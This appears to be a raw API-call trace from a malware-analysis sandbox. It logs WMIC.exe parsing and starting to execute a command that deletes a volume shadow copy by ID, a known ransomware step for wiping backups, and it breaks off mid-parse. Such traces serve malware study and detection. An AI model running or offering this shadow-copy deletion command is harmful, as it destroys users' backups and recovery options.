(param_1="wmiclivalueformat.xsl") returned 0x15 [0077.009] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.009] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0077.009] malloc (_Size=0x30) returned 0x358580 [0077.009] FreeThreadedDOMDocument:IUnknown:Release (This=0x1c071d0) returned 0x0 [0077.009] free (_Block=0x356e90) [0077.009] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete" [0077.010] malloc (_Size=0xe0) returned 0x35cd30 [0077.010] memcpy_s (in: _Destination=0x35cd30, _DestinationSize=0xde, _Source=0x1c25be, _SourceSize=0xd0 | out: _Destination=0x35cd30) returned 0x0 [0077.010] malloc (_Size=0x18) returned 0x35ca60 [0077.010] malloc (_Size=0x18) returned 0x35ca80 [0077.010] malloc (_Size=0x18) returned 0x35caa0 [0077.010] malloc (_Size=0x18) returned 0x35cac0 [0077.010] malloc (_Size=0x80) returned 0x356e90 [0077.010] GetLocalTime (in: lpSystemTime=0x18fc30 | out: lpSystemTime=0x18fc30*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x36, wSecond=0x29, wMilliseconds=0x2de)) [0077.010] _vsnwprintf (in: _Buffer=0x356e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x18fb88 | out: _Buffer="09-04-2020T08:54:41") returned 19 [0077.010] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.010] malloc (_Size=0x90) returned 0x3570a0 [0077.010] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.010] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.011] malloc (_Size=0x90) returned 0x35ce20 [0077.011] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.011] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.011] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.011] malloc (_Size=0x16) returned 0x35cae0 [0077.011] lstrlenW (lpString="shadowcopy") returned 10 [0077.011] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0077.011] malloc (_Size=0x16) returned 0x35cb00 [0077.011] malloc (_Size=0x8) returned 0x357140 [0077.011] free (_Block=0x0) [0077.011] free (_Block=0x35cae0) [0077.011] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.011] malloc (_Size=0xc) returned 0x35cae0 [0077.011] lstrlenW (lpString="where") returned 5 [0077.011] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0077.011] malloc (_Size=0xc) returned 0x35cb20 [0077.011] malloc (_Size=0x10) returned 0x35cb40 [0077.011] memmove_s (in: _Destination=0x35cb40, _DestinationSize=0x8, _Source=0x357140, _SourceSize=0x8 | out: _Destination=0x35cb40) returned 0x0 [0077.011] free (_Block=0x357140) [0077.011] free (_Block=0x0) [0077.011] free (_Block=0x35cae0) [0077.011] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.011] malloc (_Size=0x5c) returned 0x35cec0 [0077.011] lstrlenW (lpString="\"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\"") returned 45 [0077.011] _wcsicmp (_String1="\"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\"", _String2="\"NULL\"") returned -5 [0077.011] lstrlenW (lpString="\"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\"") returned 45 [0077.011] lstrlenW (lpString="\"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\"") returned 45 [0077.011] malloc (_Size=0x5c) returned 0x35cf30 [0077.011] malloc (_Size=0x18) returned 0x35cae0 [0077.011] memmove_s (in: _Destination=0x35cae0, _DestinationSize=0x10, _Source=0x35cb40, _SourceSize=0x10 | out: _Destination=0x35cae0) returned 0x0 [0077.011] free (_Block=0x35cb40) [0077.011] free (_Block=0x0) [0077.011] free (_Block=0x35cec0) [0077.011] lstrlenW (lpString=" shadowcopy where \"ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'\" delete") returned 71 [0077.011] malloc (_Size=0xe) returned 0x35cb40 [0077.012] lstrlenW (lpString="delete") returned 6 [0077.012] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0077.012] malloc (_Size=0xe) returned 0x35cb60 [0077.012] malloc (_Size=0x20) returned 0x35cec0 [0077.012] memmove_s (in: _Destination=0x35cec0, _DestinationSize=0x18, _Source=0x35cae0, _SourceSize=0x18 | out: _Destination=0x35cec0) returned 0x0 [0077.012] free (_Block=0x35cae0) [0077.012] free (_Block=0x0) [0077.012] free (_Block=0x35cb40) [0077.012] malloc (_Size=0x20) returned 0x35cef0 [0077.012] lstrlenW (lpString="QUIT") returned 4 [0077.012] lstrlenW (lpString="shadowcopy") returned 10 [0077.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0077.012] lstrlenW (lpString="EXIT") returned 4 [0077.012] lstrlenW (lpString="shadowcopy") returned 10 [0077.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0077.012] free (_Block=0x35cef0) [0077.012] WbemLocator:IUnknown:AddRef (This=0x1e91390) returned 0x2 [0077.012] malloc (_Size=0x20) returned 0x35cef0 [0077.012] lstrlenW (lpString="/") returned 1 [0077.012] lstrlenW (lpString="shadowcopy") returned 10 [0077.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0077.012] lstrlenW (lpString="-") returned 1 [0077.012] lstrlenW (lpString="shadowcopy") returned 10 [0077.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0077.012] lstrlenW (lpString="CLASS") returned 5 [0077.012] lstrlenW (lpString="shadowcopy") returned 10 [0077.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0077.012] lstrlenW (lpString="PATH") returned 4 [0077.012] lstrlenW (lpString="shadowcopy") returned 10 [0077.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0077.013] lstrlenW (lpString="CONTEXT") returned 7 [0077.013] lstrlenW (lpString="shadowcopy") returned 10 [0077.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0077.013] lstrlenW (lpString="shadowcopy") returned 10 [0077.013] malloc (_Size=0x16) returned 0x35cb40 [0077.013] lstrlenW (lpString="shadowcopy") returned 10 [0077.013] GetCurrentThreadId () returned 0x664 [0077.013] ??0CHString@@QEAA@XZ () returned 0x18fa40 [0077.013] malloc (_Size=0x18) returned 0x35cae0 [0077.013] malloc (_Size=0x18) returned 0x35cb80 [0077.013] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e91390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7b2998 | out: ppNamespace=0xff7b2998*=0x1ea3a98) returned 0x0 [0077.037] free (_Block=0x35cb80) [0077.037] free (_Block=0x35cae0) [0077.037] CoSetProxyBlanket (pProxy=0x1ea3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0077.038] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.038] GetCurrentThreadId () returned 0x664 [0077.038] ??0CHString@@QEAA@XZ () returned 0x18f8d8 [0077.038] malloc (_Size=0x18) returned 0x35cae0 [0077.038] malloc (_Size=0x18) returned 0x35cb80 [0077.038] malloc (_Size=0x18) returned 0x35cba0 [0077.038] malloc (_Size=0x18) returned 0x35cbc0 [0077.038] SysStringLen (param_1="root\\cli") returned 0x8 [0077.038] SysStringLen (param_1="\\") returned 0x1 [0077.038] malloc (_Size=0x18) returned 0x35cbe0 [0077.038] SysStringLen (param_1="root\\cli\\") returned 0x9 [0077.038] SysStringLen (param_1="ms_409") returned 0x6 [0077.038] free (_Block=0x35cbc0) [0077.038] free (_Block=0x35cba0) [0077.038] free (_Block=0x35cb80) [0077.038] free (_Block=0x35cae0) [0077.038] malloc (_Size=0x18) returned 0x35cae0 [0077.039] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e91390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7b29a0 | out: ppNamespace=0xff7b29a0*=0x1ea3b28) returned 0x0 [0077.047] free (_Block=0x35cae0) [0077.047] free (_Block=0x35cbe0) [0077.047] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.047] GetCurrentThreadId () returned 0x664 [0077.047] ??0CHString@@QEAA@XZ () returned 0x18fa50 [0077.047] malloc (_Size=0x18) returned 0x35cbe0 [0077.047] malloc (_Size=0x18) returned 0x35cae0 [0077.047] malloc (_Size=0x18) returned 0x35cb80 [0077.047] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0077.047] malloc (_Size=0x3a) returned 0x35cfa0 [0077.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff741980, cbMultiByte=-1, lpWideCharStr=0x35cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0077.047] free (_Block=0x35cfa0) [0077.047] malloc (_Size=0x18) returned 0x35cba0 [0077.047] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0077.047] SysStringLen (param_1="shadowcopy") returned 0xa [0077.047] malloc (_Size=0x18) returned 0x35cbc0 [0077.047] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0077.047] SysStringLen (param_1="'") returned 0x1 [0077.048] free (_Block=0x35cba0) [0077.048] free (_Block=0x35cb80) [0077.048] free (_Block=0x35cae0) [0077.048] free (_Block=0x35cbe0) [0077.048] IWbemServices:GetObject (in: This=0x1ea3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x18fa58*=0x0, ppCallResult=0x0 | out: ppObject=0x18fa58*=0x1eb04e0, ppCallResult=0x0) returned 0x0 [0077.060] malloc (_Size=0x18) returned 0x35cbe0 [0077.060] IWbemClassObject:Get (in: This=0x1eb04e0, wszName="Target", lFlags=0, pVal=0x18f980*(varType=0x0, wReserved1=0xff7b, wReserved2=0x0, wReserved3=0x0, varVal1=0xff7b2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f980*(varType=0x8, wReserved1=0xff7b, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.060] free (_Block=0x35cbe0) [0077.060] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0077.060] malloc (_Size=0x3e) returned 0x35cfa0 [0077.060] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0077.060] malloc (_Size=0x18) returned 0x35cbe0 [0077.060] IWbemClassObject:Get (in: This=0x1eb04e0, wszName="PWhere", lFlags=0, pVal=0x18f980*(varType=0x0, wReserved1=0xff7b, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ee298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f980*(varType=0x8, wReserved1=0xff7b, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.060] free (_Block=0x35cbe0) [0077.060] lstrlenW (lpString=" Where ID = '#'") returned 15 [0077.060] malloc (_Size=0x20) returned 0x35cff0 [0077.060] lstrlenW (lpString=" Where ID = '#'") returned 15 [0077.060] malloc (_Size=0x18) returned 0x35cbe0 [0077.060] IWbemClassObject:Get (in: This=0x1eb04e0, wszName="Connection", lFlags=0, pVal=0x18f980*(varType=0x0, wReserved1=0xff7b, wReserved2=0x0, wReserved3=0x0, varVal1=0x23bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f980*(varType=0xd, wReserved1=0xff7b, wReserved2=0x0, wReserved3=0x0, varVal1=0x1eb09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.061] free (_Block=0x35cbe0) [0077.061] IUnknown:QueryInterface (in: This=0x1eb09c0, riid=0xff747360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x18f970 | out: ppvObject=0x18f970*=0x1eb09c0) returned 0x0 [0077.061] GetCurrentThreadId () returned 0x664 [0077.061] ??0CHString@@QEAA@XZ () returned 0x18f898 [0077.061] malloc (_Size=0x18) returned 0x35cbe0 [0077.061] IWbemClassObject:Get (in: This=0x1eb09c0, wszName="Namespace", lFlags=0, pVal=0x18f8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff75738f, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x35cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.061] free (_Block=0x35cbe0) [0077.061] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0077.061] malloc (_Size=0x16) returned 0x35cbe0 [0077.061] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0077.061] malloc (_Size=0x18) returned 0x35cae0 [0077.061] IWbemClassObject:Get (in: This=0x1eb09c0, wszName="Locale", lFlags=0, pVal=0x18f8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x35cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.061] free (_Block=0x35cae0) [0077.061] lstrlenW (lpString="ms_409") returned 6 [0077.061] malloc (_Size=0xe) returned 0x35cae0 [0077.061] lstrlenW (lpString="ms_409") returned 6 [0077.061] malloc (_Size=0x18) returned 0x35cb80 [0077.061] IWbemClassObject:Get (in: This=0x1eb09c0, wszName="User", lFlags=0, pVal=0x18f8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.061] free (_Block=0x35cb80) [0077.061] malloc (_Size=0x18) returned 0x35cb80 [0077.061] IWbemClassObject:Get (in: This=0x1eb09c0, wszName="Password", lFlags=0, pVal=0x18f8c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.061] free (_Block=0x35cb80) [0077.062] malloc (_Size=0x18) returned 0x35cb80 [0077.062] IWbemClassObject:Get (in: This=0x1eb09c0, wszName="Server", lFlags=0, pVal=0x18f8c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x35cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.062] free (_Block=0x35cb80) [0077.062] lstrlenW (lpString=".") returned 1 [0077.062] malloc (_Size=0x4) returned 0x357140 [0077.062] lstrlenW (lpString=".") returned 1 [0077.062] malloc (_Size=0x18) returned 0x35cb80 [0077.062] IWbemClassObject:Get (in: This=0x1eb09c0, wszName="Authority", lFlags=0, pVal=0x18f8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0x35cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0077.062] free (_Block=0x35cb80) [0077.062] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.062] IUnknown:Release (This=0x1eb09c0) returned 0x1 [0077.062] GetCurrentThreadId () returned 0x664 [0077.062] ??0CHString@@QEAA@XZ () returned 0x18f898 [0077.062] malloc (_Size=0x18) returned 0x35cb80 [0077.062] IWbemClassObject:Get (in: This=0x1eb04e0, wszName="__RELPATH", lFlags=0, pVal=0x18f8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0077.062] free (_Block=0x35cb80) [0077.062] malloc (_Size=0x18) returned 0x35cb80 [0077.062] GetCurrentThreadId () returned 0x664 [0077.062] ??0CHString@@QEAA@XZ () returned 0x18f718 [0077.062] ??0CHString@@QEAA@PEBG@Z () returned 0x18f730 [0077.063] ??0CHString@@QEAA@AEBV0@@Z () returned 0x18f6c0 [0077.063] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0077.063] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x35d020 [0077.063] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0077.063] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18f680 [0077.063] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f6c8 [0077.063] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f730 [0077.063] ??1CHString@@QEAA@XZ () returned 0x137a8601 [0077.063] ??1CHString@@QEAA@XZ () returned 0x137a8601 [0077.063] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18f688 [0077.063] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f6c0 [0077.063] ??1CHString@@QEAA@XZ () returned 0x1 [0077.063] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x35d090 [0077.063] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0077.063] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18f680 [0077.064] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f6c8 [0077.064] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f730 [0077.064] ??1CHString@@QEAA@XZ () returned 0x137a8601 [0077.064] ??1CHString@@QEAA@XZ () returned 0x137a8601 [0077.064] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18f688 [0077.064] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f6c0 [0077.064] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.064] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0077.064] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.064] malloc (_Size=0x18) returned 0x35cba0 [0077.064] malloc (_Size=0x18) returned 0x35cc00 [0077.064] malloc (_Size=0x18) returned 0x35cc20 [0077.064] malloc (_Size=0x18) returned 0x35cc40 [0077.064] malloc (_Size=0x18) returned 0x35cc60 [0077.064] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0077.064] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0077.064] malloc (_Size=0x18) returned 0x35cc80 [0077.064] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0077.064] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0077.065] malloc (_Size=0x18) returned 0x35cca0 [0077.065] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0077.065] SysStringLen (param_1="\"") returned 0x1 [0077.065] free (_Block=0x35cc80) [0077.065] free (_Block=0x35cc60) [0077.065] free (_Block=0x35cc40) [0077.065] free (_Block=0x35cc20) [0077.065] free (_Block=0x35cc00) [0077.065] free (_Block=0x35cba0) [0077.065] IWbemServices:GetObject (in: This=0x1ea3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x18f708*=0x0, ppCallResult=0x0 | out: ppObject=0x18f708*=0x1eb0a50, ppCallResult=0x0) returned 0x0 [0077.067] malloc (_Size=0x18) returned 0x35cba0 [0077.067] IWbemClassObject:Get (in: This=0x1eb0a50, wszName="Text", lFlags=0, pVal=0x18f740*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff7b2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x18f740*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x264aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1ee030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0077.067] free (_Block=0x35cba0) [0077.067] SafeArrayGetLBound (in: psa=0x264aa0, nDim=0x1, plLbound=0x18f720 | out: plLbound=0x18f720) returned 0x0 [0077.067] SafeArrayGetUBound (in: psa=0x264aa0, nDim=0x1, plUbound=0x18f710 | out: plUbound=0x18f710) returned 0x0 [0077.067] SafeArrayGetElement (in: psa=0x264aa0, rgIndices=0x18f704, pv=0x18f758 | out: pv=0x18f758) returned 0x0 [0077.067] malloc (_Size=0x18) returned 0x35cba0 [0077.067] malloc (_Size=0x18) returned 0x35cc00 [0077.067] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0077.067] free (_Block=0x35cba0) [0077.067] IUnknown:Release (This=0x1eb0a50) returned 0x0 [0077.067] free (_Block=0x35cca0) [0077.067] ??1CHString@@QEAA@XZ () returned 0x137a8601 [0077.067] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.067] free (_Block=0x35cb80) [0077.068] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.068] lstrlenW (lpString="Shadow copy management.") returned 23 [0077.068] malloc (_Size=0x30) returned 0x3585c0 [0077.068] lstrlenW (lpString="Shadow copy management.") returned 23 [0077.068] free (_Block=0x35cc00) [0077.068] IUnknown:Release (This=0x1eb04e0) returned 0x0 [0077.068] free (_Block=0x35cbc0) [0077.068] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0077.068] lstrlenW (lpString="PATH") returned 4 [0077.068] lstrlenW (lpString="where") returned 5 [0077.068] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0077.068] lstrlenW (lpString="WHERE") returned 5 [0077.068] lstrlenW (lpString="where") returned 5 [0077.068] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0077.068] lstrlenW (lpString="/") returned 1 [0077.068] lstrlenW (lpString="ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 43 [0077.068] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0077.068] lstrlenW (lpString="-") returned 1 [0077.068] lstrlenW (lpString="ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 43 [0077.068] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0077.068] lstrlenW (lpString="ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 43 [0077.068] malloc (_Size=0x58) returned 0x35d020 [0077.068] lstrlenW (lpString="ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 43 [0077.068] lstrlenW (lpString="/") returned 1 [0077.068] lstrlenW (lpString="delete") returned 6 [0077.068] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0077.068] lstrlenW (lpString="-") returned 1 [0077.068] lstrlenW (lpString="delete") returned 6 [0077.068] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0077.068] lstrlenW (lpString="delete") returned 6 [0077.068] malloc (_Size=0xe) returned 0x35cbc0 [0077.068] lstrlenW (lpString="delete") returned 6 [0077.069] lstrlenW (lpString="GET") returned 3 [0077.069] lstrlenW (lpString="delete") returned 6 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0077.069] lstrlenW (lpString="LIST") returned 4 [0077.069] lstrlenW (lpString="delete") returned 6 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0077.069] lstrlenW (lpString="SET") returned 3 [0077.069] lstrlenW (lpString="delete") returned 6 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0077.069] lstrlenW (lpString="CREATE") returned 6 [0077.069] lstrlenW (lpString="delete") returned 6 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0077.069] lstrlenW (lpString="CALL") returned 4 [0077.069] lstrlenW (lpString="delete") returned 6 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0077.069] lstrlenW (lpString="ASSOC") returned 5 [0077.069] lstrlenW (lpString="delete") returned 6 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0077.069] lstrlenW (lpString="DELETE") returned 6 [0077.069] lstrlenW (lpString="delete") returned 6 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0077.069] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0077.069] malloc (_Size=0x3e) returned 0x35d080 [0077.069] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0077.069] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0077.069] malloc (_Size=0x18) returned 0x35cc00 [0077.069] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0077.069] lstrlenW (lpString="FROM") returned 4 [0077.069] lstrlenW (lpString="*") returned 1 [0077.069] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0077.069] malloc (_Size=0x18) returned 0x35cb80 [0077.070] free (_Block=0x35cc00) [0077.070] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0077.070] lstrlenW (lpString="FROM") returned 4 [0077.070] 